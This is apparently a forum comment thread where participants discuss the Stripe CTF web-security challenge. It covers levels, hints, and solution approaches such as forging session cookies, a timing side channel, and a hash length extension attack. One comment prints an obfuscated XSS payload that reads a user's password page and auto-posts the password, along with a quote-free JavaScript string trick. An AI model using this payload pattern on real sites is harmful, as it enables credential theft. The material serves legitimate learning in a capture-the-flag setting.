Stripe CTF Writeup

First ctf here too. Though some people are claiming people were posting answers to irc, I didn't see that happen once. Though, I didn't start lurking until I got stuck on level 5.<p>What I did see was an awesome group of folks willing to help nudge others in the right direction. Many folks would stick around in prior level channels once they solved the level and offer pointers as to what to look for and where to look for it. Awesome.<p>I convinced myself it wasn't "cheating" because a) I'm a total noob, and b) sometimes pentesting happens with a team where people bounce ideas off one another.<p>I spent probably 20 hours trying to finish level 8, and even though I didn't end up getting it, this was a great experience. I'm fully inspired to get better at python and actually ctff next time.<p>Also, again, awesome how cool the people in irc were.

For levels 4, 5, 6, the Sinatra configuration used client-side cookies for session and the session secret is exposed in the error page. Crashing the app and injecting custom values into the session cookie was how I got through all 3 of them. I did feel like I'm missing the point of the challenge somehow.

First time I took part in one of these challenges and I enjoyed it a lot. I made it only up to level 3 and seeing comments of others at higher levels saying it was easy, wasn't very good for my self-confidence :-) However, I can only assume they had some prior experience in this field and / or had an IQ of 150 (<a href="http://abiusx.com/stripe-ctf-2-web-challenges/" rel="nofollow">http://abiusx.com/stripe-ctf-2-web-challenges/</a>).<p>After having spent more than a day on level 3 I decided to look on-line for solutions and came across the aforementioned website. I was happy to see my attempt was pretty close but looking at the rest of the levels it was obvious I was out of my depth and gave up (it was already Tuesday anyway).<p>These write-ups are nice (although abiusx' ought to have been posted only after the challenge was finished) to see how others have solved the levels in different ways.<p>I can't wait for the next challenge from Stripe and will definitely check out some others on-line. It's like puzzles for grown men.

Great, I've been waiting for this. Now I can finally get past level 2 -- I didn't realize a non-existent file would work, even though I did figure you could overwrite variables due to the get. I considered overwriting filename with "index.php" and figuring out what attempt would have to be to pass -- but that was too much work for a simple challenge when I had enough other stuff to do ;-)<p>At least I identified the "correct" vulnerability.

I learned another interesting way to create strings in JavaScript without using a quote character:<p><pre><code> var s = /string you want/.source;</code></pre>

As various people are commenting on #8: modern server operating systems do not do this behavior "by default". The hints from Stripe were all "run it and it will be obvious", but while the exploit worked fine on my laptop, I went to the trouble of duplicating the setup they had as exactly as I could, setting up the same version of Ubuntu they were using in the same EC2 region (which then implies the same version of Twisted: 10.0.0, despite their being adamant about 11.1.0, which I figured might even be the problem), and it didn't actually do that: reasonable server systems are configured, out of the box, to randomize that side channel. I personally believe that this is part of why there was such a cliff when everyone hit level #8 with regards to difficulty in solving.

An important aspect to #8 was the 250ms lock, that allowed you to send multiple requests while others were locked out. First I was trying to send the requests from my local machine, which made it nearly impossible to get usable numbers because of the delay in the network.<p>Before I started using level2 machine to both send and receive, I was planning to bind on every port of the level2 server to stop/slow others thus raising my own chances of hit. Luckily it didn't come to that.<p>Even before the port number attack, I was trying to find a pattern in the request object pointer values in subsequent backtraces. This gave me the port idea.<p>Also spent a few hours trying to exploit the Twisted HTTP client by malformed HTTP redirects (taking the over- specified Twisted version in the README as a clue).

Finished as 30th, when we still had to actually work to get the answers (shortly after that everyone just started posting the answers in the IRC channels). Level 8 was a really nice challenge. After completing the challenge I managed to optimize my level 8 solution a lot, so much that it managed to finish in under 3 minutes by only doing roughly 2400 API calls (2000 for the bruteforcing itself, 400 to compensate for other players).<p><a href="https://gist.github.com/38c0430b5084f8442858" rel="nofollow">https://gist.github.com/38c0430b5084f8442858</a> for those who are interested. There aren't many comments in there though

I only made it to level 5, but I see that the later levels would have stopped me in my tracks anyway! I'm curious to see other solutions, especially for level 8. Was brute-forcing with a script really the only way?

For those like me who enjoyed level8 so much and want to see how their strategy compares to others', go to <a href="http://level8-scores.danopia.net/" rel="nofollow">http://level8-scores.danopia.net/</a><p>These two awesome guys (early capturer) rewrote level8 server, set up a level2-like server, and created an IRC bot that lets you run your code (after requesting SSH access to the level2-bonus server) against other in a speedrun on a random flag (same flag for every participant to a round).<p>Best capture time and lowest requests count wins. It's quite a lot of fun, check it out.

Very similar to the methods I used :)<p>On level 5 I used a textfile on the compromised level 2 server instead of the 'cleaner' method shown here.<p>On level 6 I used some more JS:<p>}];&#60;/script&#62;&#60;script type=text/html id=payload&#62;$.get(<i>/user-hfbnljhhim/user_info</i>).done(function(data) { var pwd = escape($(data).find(<i>table tr td:last</i>).text()); $(<i>#title</i>).val(<i>pwd</i>); $(<i>#content</i>).val(pwd); $(<i>form</i>).unbind(<i>submit</i>); $(<i>form</i>).trigger(<i>submit</i>); } )&#60;/script&#62;&#60;script type=text/javascript&#62;$(function() {eval(String.fromCharCode(118,97,114,32,112,97,121,108,111,97,100,32,61,32,39,35,112,97,121,108,111,97,100,39)); eval($(payload).text().replace(/[*]/g, String.fromCharCode(39))); var post_data = [{}];});&#60;/script&#62;&#60;script&#62; var t = [{<p>It's funny to see how similar the python script is in level 8 with what I wrote, would be cool to see more writeups on this one with different solutions :)

Arrg! So close <a href="https://stripe-ctf.com/progress/fduran" rel="nofollow">https://stripe-ctf.com/progress/fduran</a> if only I had started earlier.<p>For the last level I solved it locally but in the server I didn't get the '3' port difference for the first password chunk (at lest in the first rounds) so I made it more complicated by getting as candidates the small port differences and running those again and culling again, got the 1st chunk of my flag before running out of time... oh well.<p>Stripe people made an excellent job, I really enjoyed the challenge. They were blogging than the set up took only a couple of man-weeks, given the success of this CTF I think there may be a start-up idea here: to use similar challenges for programming and/or security training/job interviews.<p>I'll take someone who solved by himself/herself this ctf over a CISSP in most situations any time (I'm a CISSP myself).

I got to level 6 before I quit. I'm certain I could complete it but I could not justify spending any more time on it.<p>In contrast to their previous ctf, this time the contest itself seemed less technically robust. The site didn't work in a browser without javascript support (elinks). On level 6, the "social network" app did not work with the (quite old) version of Chrome I have; Opera could post a single message after loading the page, but after that it would silently fail to post any further messages.<p>I still have the shirt from the previous ctf. Dealing with disassembly was a lot more enjoyable than trying to learn jquery.

This was the first time I seriously tried to do a CtF and it was surprisingly fun. I spend almost the entire weekend working on it and was surprised by my eventual success despite needing some help. I'm pretty sure I would have given up on level 7 if I hadn't seen the paper on the Flickr API. This insight will actually make my code better.<p>Thanks to the Stripe Team for the challenge and the T-shirt :)

I got through level 6 on my own. Level 7 requires an understanding of crypto, which to me isn't a web vulnerability per se. I eventually broke it with the hint that the vulnerability was a hash length extension attack, but I never would have thought of that on my own. Level 8 seemed really involved, and I threw in the towel. :)

This was a lot of fun while it lasted. We should do it more often. Are you guys up for a community driven CTF on a regular basis? It could be a lot of fun. We could create a pot where everybody can contribute towards the prize.

The last task was <i>really</i> obscure, must have taken a while to figure that one out